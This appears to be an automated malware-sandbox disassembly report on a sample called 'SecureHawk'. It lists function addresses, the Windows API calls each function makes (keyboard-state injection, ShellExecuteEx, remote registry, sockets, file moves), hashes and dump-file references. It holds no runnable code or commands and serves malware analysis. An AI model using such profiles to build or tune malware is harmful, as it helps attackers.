                                  • String ID: SysListView32
                                  • API String ID: 307300125-78025650
                                  • Opcode ID: 8dc1f332893e5a9fb003fe67c0320528388a053af16e65ca59e906c23274cd6f
                                  • Instruction ID: 2367db2b2b6c834ece069af729761890fa1ca07157bc847068ff717c3074bf58
                                  • Opcode Fuzzy Hash: 8dc1f332893e5a9fb003fe67c0320528388a053af16e65ca59e906c23274cd6f
                                  • Instruction Fuzzy Hash: A141B531904308AFEB22DF64CC85BEE77E9EF08350F11486AF598A7192D7759D84CB50
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0035466F
                                  • LoadStringW.USER32(00000000), ref: 00354676
                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0035468C
                                  • LoadStringW.USER32(00000000), ref: 00354693
                                  • _wprintf.LIBCMT ref: 003546B9
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003546D7
                                  Strings
                                  • %s (%d) : ==> %s: %s %s, xrefs: 003546B4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString$Message_wprintf
                                  • String ID: %s (%d) : ==> %s: %s %s
                                  • API String ID: 3648134473-3128320259
                                  • Opcode ID: e471854389450e5bd5337ee95d03ba85064da9eb281ea00e1f12177da77e3073
                                  • Instruction ID: ff30bfeafad079a0c20a4aaa7101a68b8bc514e3db5eff30a2c7eece87fcdd21
                                  • Opcode Fuzzy Hash: e471854389450e5bd5337ee95d03ba85064da9eb281ea00e1f12177da77e3073
                                  • Instruction Fuzzy Hash: FE0162F69403087FE756A7909D89FF6776CEB08301F0005D5BB45E6051EA745E988B71
                                  APIs
                                    • Part of subcall function 002F29E2: GetWindowLongW.USER32(?,000000EB), ref: 002F29F3
                                  • GetSystemMetrics.USER32(0000000F), ref: 0037D89F
                                  • GetSystemMetrics.USER32(0000000F), ref: 0037D8BF
                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0037DAFA
                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0037DB18
                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0037DB39
                                  • ShowWindow.USER32(00000003,00000000), ref: 0037DB58
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0037DB7D
                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 0037DBA0
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                  • String ID:
                                  • API String ID: 1211466189-0
                                  • Opcode ID: 3ccd96065706d3400ec08e4b94390815938f103278364478f1075429bb13344a
                                  • Instruction ID: 2c436da02b0087721e2b09b10b26801c3dc1c977a1172481b7e2faa86167ad1f
                                  • Opcode Fuzzy Hash: 3ccd96065706d3400ec08e4b94390815938f103278364478f1075429bb13344a
                                  • Instruction Fuzzy Hash: 3EB18931600215EFDF2ACF68C9C5BA97BB5FF04711F0AC169ED48AB295D738A950CB60
                                  APIs
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                    • Part of subcall function 00371242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003701D5,?,?), ref: 00371259
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00370216
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BuffCharConnectRegistryUpper_memmove
                                  • String ID:
                                  • API String ID: 3479070676-0
                                  • Opcode ID: 874b6daec169143bb5c6d1f328e31733a8247ee44c98bb2ef25c596939f2d2d1
                                  • Instruction ID: c894cc3b5da3b6dbebf4a3eaefa7df05a7e23aae70a488da8918e466520f6e17
                                  • Opcode Fuzzy Hash: 874b6daec169143bb5c6d1f328e31733a8247ee44c98bb2ef25c596939f2d2d1
                                  • Instruction Fuzzy Hash: F5A1DC71204205DFCB26EF54C891B2EB7E5BF84314F04881CFA9A9B2A2DB34E905CF42
                                  APIs
                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0032C438,00000004,00000000,00000000,00000000), ref: 002F2E9F
                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0032C438,00000004,00000000,00000000,00000000,000000FF), ref: 002F2EE7
                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0032C438,00000004,00000000,00000000,00000000), ref: 0032C48B
                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0032C438,00000004,00000000,00000000,00000000), ref: 0032C4F7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ShowWindow
                                  • String ID:
                                  • API String ID: 1268545403-0
                                  • Opcode ID: ef64ce7a5c45b57ab7deec46280b7194332850e8b3d3ac512e83339f511e336a
                                  • Instruction ID: 9b36105a9475c30cd115590f08541ea47b91d063aabcc0ce556d5ae98c28b798
                                  • Opcode Fuzzy Hash: ef64ce7a5c45b57ab7deec46280b7194332850e8b3d3ac512e83339f511e336a
                                  • Instruction Fuzzy Hash: A1416830634789DAC73B9B29D8A877BFBD6AB83340F34842DE64746961C674B86CC710
                                  APIs
                                  • DeleteObject.GDI32(00000000), ref: 003765D8
                                  • GetDC.USER32(00000000), ref: 003765E0
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003765EB
                                  • ReleaseDC.USER32(00000000,00000000), ref: 003765F7
                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00376633
                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00376644
                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00379417,?,?,000000FF,00000000,?,000000FF,?), ref: 0037667E
                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0037669E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                  • String ID:
                                  • API String ID: 3864802216-0
                                  • Opcode ID: c4ef81f214b38fd6154878cbf9adf2d399974705582816f53fd19b834b5e9a85
                                  • Instruction ID: 685955ad4a4619b4929876a7b79893defd458b874201e72100157eab4be4a787
                                  • Opcode Fuzzy Hash: c4ef81f214b38fd6154878cbf9adf2d399974705582816f53fd19b834b5e9a85
                                  • Instruction Fuzzy Hash: 74318D722016147FEF268F10CC8AFAA3FADEF49761F054091FE089A291D6799855CBB4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memcmp
                                  • String ID:
                                  • API String ID: 2931989736-0
                                  • Opcode ID: c5db9dac1ea80227090e5b6dc3a7fa676585b0de2b6104711051d463035dffd8
                                  • Instruction ID: 779a23d626f9cc33b28616777b811d51d22dcd9dafe8513a8098dcea11bd33eb
                                  • Opcode Fuzzy Hash: c5db9dac1ea80227090e5b6dc3a7fa676585b0de2b6104711051d463035dffd8
                                  • Instruction Fuzzy Hash: 0E213761A132057B925775268D42FFF77AD9E46B80B0550A2FD06EF242FB50FF2182A8
                                  APIs
                                    • Part of subcall function 002F4D37: __itow.LIBCMT ref: 002F4D62
                                    • Part of subcall function 002F4D37: __swprintf.LIBCMT ref: 002F4DAC
                                    • Part of subcall function 0030436A: _wcscpy.LIBCMT ref: 0030438D
                                  • _wcstok.LIBCMT ref: 0035F144
                                  • _wcscpy.LIBCMT ref: 0035F1D3
                                  • _memset.LIBCMT ref: 0035F206
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                  • String ID: X
                                  • API String ID: 774024439-3081909835
                                  • Opcode ID: 416d89ceeb73b5c7bcd558b4d262c1363108210b4abbccabab0d2ce46956f8a8
                                  • Instruction ID: 1843cbd4c90daf08db98c5abf6c50fa8471d7331bb8843a6873dc4b27f792b7f
                                  • Opcode Fuzzy Hash: 416d89ceeb73b5c7bcd558b4d262c1363108210b4abbccabab0d2ce46956f8a8
                                  • Instruction Fuzzy Hash: 98C19E746043009FD716EF24C891EABB7E4EF85351F10492DF9999B2A2DB70ED49CB82
                                  APIs
                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003670B0
                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003670D1
                                  • WSAGetLastError.WSOCK32(00000000), ref: 003670E4
                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 0036719A
                                  • inet_ntoa.WSOCK32(?), ref: 00367157
                                    • Part of subcall function 0034B2CD: _strlen.LIBCMT ref: 0034B2D7
                                    • Part of subcall function 0034B2CD: _memmove.LIBCMT ref: 0034B2F9
                                  • _strlen.LIBCMT ref: 003671F4
                                  • _memmove.LIBCMT ref: 0036725D
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                  • String ID:
                                  • API String ID: 3619996494-0
                                  • Opcode ID: 34416397992a8d87b0d969a960dd2389c137e1c2244a2eb0859ac1b9afb4a95d
                                  • Instruction ID: ac25630915fbb85396b9b132f7453176cc0ad527f4761046a20da48dbf14877a
                                  • Opcode Fuzzy Hash: 34416397992a8d87b0d969a960dd2389c137e1c2244a2eb0859ac1b9afb4a95d
                                  • Instruction Fuzzy Hash: 2B81D071108300ABD316EB24DC92E7BB7A8AF84758F50892CFA559B292DB71ED05CB91
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e885e851116fc7c761989c5b06448a53a3dc4101aaf71b602479c4720e0823d9
                                  • Instruction ID: 6e3da5026e3c3e9d57ad162247317b6b8e70242daa689985016797c4fd7916a6
                                  • Opcode Fuzzy Hash: e885e851116fc7c761989c5b06448a53a3dc4101aaf71b602479c4720e0823d9
                                  • Instruction Fuzzy Hash: C4719D30910109EFDB09DF98CC49EBEBB79FF85350F548169FA15AA251C7309A61CFA0
                                  APIs
                                  • IsWindow.USER32(01235888), ref: 0037B7D8
                                  • IsWindowEnabled.USER32(01235888), ref: 0037B7E4
                                  • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0037B8C8
                                  • SendMessageW.USER32(01235888,000000B0,?,?), ref: 0037B8FF
                                  • IsDlgButtonChecked.USER32(?,?), ref: 0037B93C
                                  • GetWindowLongW.USER32(01235888,000000EC), ref: 0037B95E
                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0037B976
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                  • String ID:
                                  • API String ID: 4072528602-0
                                  • Opcode ID: 3b50db49c7c1984f46ed94d93e6671abc09d50dd10e3fd044dc50c2493941cb5
                                  • Instruction ID: 905b939df966e92c9f59562fdc3238687f923a29abf3f52d6c93cda6ef4d58cb
                                  • Opcode Fuzzy Hash: 3b50db49c7c1984f46ed94d93e6671abc09d50dd10e3fd044dc50c2493941cb5
                                  • Instruction Fuzzy Hash: 10718C34A00288BFEB369F54C8D5FAAFBBDEF49300F158059EA5997291D739AC50CB11
                                  APIs
                                  • _memset.LIBCMT ref: 0036F8F9
                                  • _memset.LIBCMT ref: 0036F9C2
                                  • ShellExecuteExW.SHELL32(?), ref: 0036FA07
                                    • Part of subcall function 002F4D37: __itow.LIBCMT ref: 002F4D62
                                    • Part of subcall function 002F4D37: __swprintf.LIBCMT ref: 002F4DAC
                                    • Part of subcall function 0030436A: _wcscpy.LIBCMT ref: 0030438D
                                  • GetProcessId.KERNEL32(00000000), ref: 0036FA7E
                                  • CloseHandle.KERNEL32(00000000), ref: 0036FAAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                  • String ID: @
                                  • API String ID: 3522835683-2766056989
                                  • Opcode ID: 1220ad966d0b3edd0ec45743ea3b5d5af441ef8a48251e01a992395d8eb9304d
                                  • Instruction ID: 0eb186c78d32b0ca70653237805d8e33a64cea3053936d381489f9ac9f325437
                                  • Opcode Fuzzy Hash: 1220ad966d0b3edd0ec45743ea3b5d5af441ef8a48251e01a992395d8eb9304d
                                  • Instruction Fuzzy Hash: 4B61ED75A006199FCB16EF94D481AAEFBF5FF48314F008069E95AAB351CB70AD51CF90
                                  APIs
                                  • GetParent.USER32(?), ref: 003515F7
                                  • GetKeyboardState.USER32(?), ref: 0035160C
                                  • SetKeyboardState.USER32(?), ref: 0035166D
                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 0035169B
                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 003516BA
                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00351700
                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00351723
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 29beaf2fc30c4d1992d5f1697fc172f0ac576cdbcb2262ad2f882d3a5bff0cb2
                                  • Instruction ID: eb1ad5bb80a4c33c5108d073e290acde18f351bfcfb38b25ffd478962b958fb4
                                  • Opcode Fuzzy Hash: 29beaf2fc30c4d1992d5f1697fc172f0ac576cdbcb2262ad2f882d3a5bff0cb2
                                  • Instruction Fuzzy Hash: D751D4A05047D13EFB374228CC55FB6BFA95B06306F0D4989E9D5458E2D3E8AC9CD750
                                  APIs
                                  • GetParent.USER32(00000000), ref: 00351410
                                  • GetKeyboardState.USER32(?), ref: 00351425
                                  • SetKeyboardState.USER32(?), ref: 00351486
                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003514B2
                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003514CF
                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00351513
                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00351534
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 8ae29b564b204a479274bf8987c1c8aeaebed72c184b2d04cf6188f3039a89b0
                                  • Instruction ID: 3499a0b84846866902369c922f5ed93a26857f64a12094f918b851ccf0d2026f
                                  • Opcode Fuzzy Hash: 8ae29b564b204a479274bf8987c1c8aeaebed72c184b2d04cf6188f3039a89b0
                                  • Instruction Fuzzy Hash: A55127A05443D13DFB3783258C51F76BFB9AB46302F0C4889E9D64A8E2D2A4EC8CD750
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _wcsncpy$LocalTime
                                  • String ID:
                                  • API String ID: 2945705084-0
                                  • Opcode ID: d068da3de45aea6b764bb9c76029a8e51861f8605b8a38b26301aa7a9085507b
                                  • Instruction ID: 1f9189b310d72e8850503ac11ec7e03b3ed84e7f3d4d208c5e021f876a8018a1
                                  • Opcode Fuzzy Hash: d068da3de45aea6b764bb9c76029a8e51861f8605b8a38b26301aa7a9085507b
                                  • Instruction Fuzzy Hash: 38417F65C2161475CB17EBA4C88ADCFB3BC9F08310F508966F918E7221E774E399C7A9
                                  APIs
                                    • Part of subcall function 00354A30: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003539F7,?), ref: 00354A4D
                                    • Part of subcall function 00354A30: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003539F7,?), ref: 00354A66
                                  • lstrcmpiW.KERNEL32(?,?), ref: 00353A17
                                  • _wcscmp.LIBCMT ref: 00353A33
                                  • MoveFileW.KERNEL32(?,?), ref: 00353A4B
                                  • _wcscat.LIBCMT ref: 00353A93
                                  • SHFileOperationW.SHELL32(?), ref: 00353AFF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                  • String ID: \*.*
                                  • API String ID: 1377345388-1173974218
                                  • Opcode ID: 402f5f5921d49f0629e62b0e7c489dffae3c53b9cd3802de9e0de99d840fa2da
                                  • Instruction ID: a8d416943625b0ea18acec7a2d8a86b027f80580cf7d5addfc4fa7f4d06ede42
                                  • Opcode Fuzzy Hash: 402f5f5921d49f0629e62b0e7c489dffae3c53b9cd3802de9e0de99d840fa2da
                                  • Instruction Fuzzy Hash: A3417F71508344AECB57EB64D441ADBB7FCEF88380F00092EB88AC7161EA34D68DCB56
                                  APIs
                                  • _memset.LIBCMT ref: 00377697
                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0037773E
                                  • IsMenu.USER32(?), ref: 00377756
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0037779E
                                  • DrawMenuBar.USER32 ref: 003777B1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                  • String ID: 0
                                  • API String ID: 3866635326-4108050209
                                  • Opcode ID: 32bd2697bcaff1120296ff8df89d0da1f5e056a75264317dfa5d4b7e1e714ffa
                                  • Instruction ID: cbbd601eeb2262266d17952f6490e27219c02253f73c1412364a69807257e747
                                  • Opcode Fuzzy Hash: 32bd2697bcaff1120296ff8df89d0da1f5e056a75264317dfa5d4b7e1e714ffa
